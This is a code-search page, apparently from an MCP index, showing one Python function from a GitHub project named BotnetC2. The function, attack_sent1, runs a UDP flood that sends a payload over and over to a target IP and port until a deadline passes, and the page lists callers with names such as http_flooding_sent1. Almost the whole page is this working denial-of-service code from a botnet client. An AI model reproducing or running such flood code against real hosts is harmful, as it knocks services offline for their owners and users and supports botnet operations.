MCPcopy Create free account
hub / github.com/Hex1629/BotnetC2 / attack_sent1

Function attack_sent1

BOTNETc2/bot.py:348–358  ·  view source on GitHub ↗
(ip, port, secs,payload)

Source from the content-addressed store, hash-verified

346 dos.close()
347
348def attack_sent1(ip, port, secs,payload):
349
350 while time.time() < secs:
351
352 s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
353 s.sendto(payload, (ip, port))
354 s.sendto(payload, (ip, port))
355 s.sendto(payload, (ip, port))
356 s.sendto(payload, (ip, port))
357 s.sendto(payload, (ip, port))
358 s.sendto(payload, (ip, port))
359
360def attack_syn(ip, port, secs):
361

Callers 4

http_flooding_sent1Function · 0.70
all_sent1Function · 0.70
http_req_allFunction · 0.70
http_req2Function · 0.70

Calls

no outgoing calls

Tested by

no test coverage detected